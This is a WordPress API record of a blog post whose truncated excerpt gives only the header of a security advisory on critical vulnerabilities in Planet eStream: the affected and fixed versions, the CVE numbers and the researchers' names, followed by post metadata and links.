SEC Consult Vulnerability Lab Security Advisory < 20221130-0 > ======================================================================= title: Multiple critical vulnerabilities product: Planet Enterprises Ltd – Planet eStream vulnerable version: <6.72.10.07 fixed version: 6.72.10.07 CVE number: CVE-2022-45896, CVE-2022-45893, CVE-2022-45891, CVE-2022-45889, CVE-2022-45892, CVE-2022-45890, CVE-2022-45894, CVE-2022-45895 impact: critical homepage: https:\/\/www.planetestream.co.uk found: 2022-09-01 by: Timon Vogel (Office Vienna) Philipp Espernberger (Office Linz) Hrvoje Filakovic (Office …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34571","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34571","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34571"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34571\/revisions"}],"predecessor-version":[{"id":34626,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34571\/revisions\/34626"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34571"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34571"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34571"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}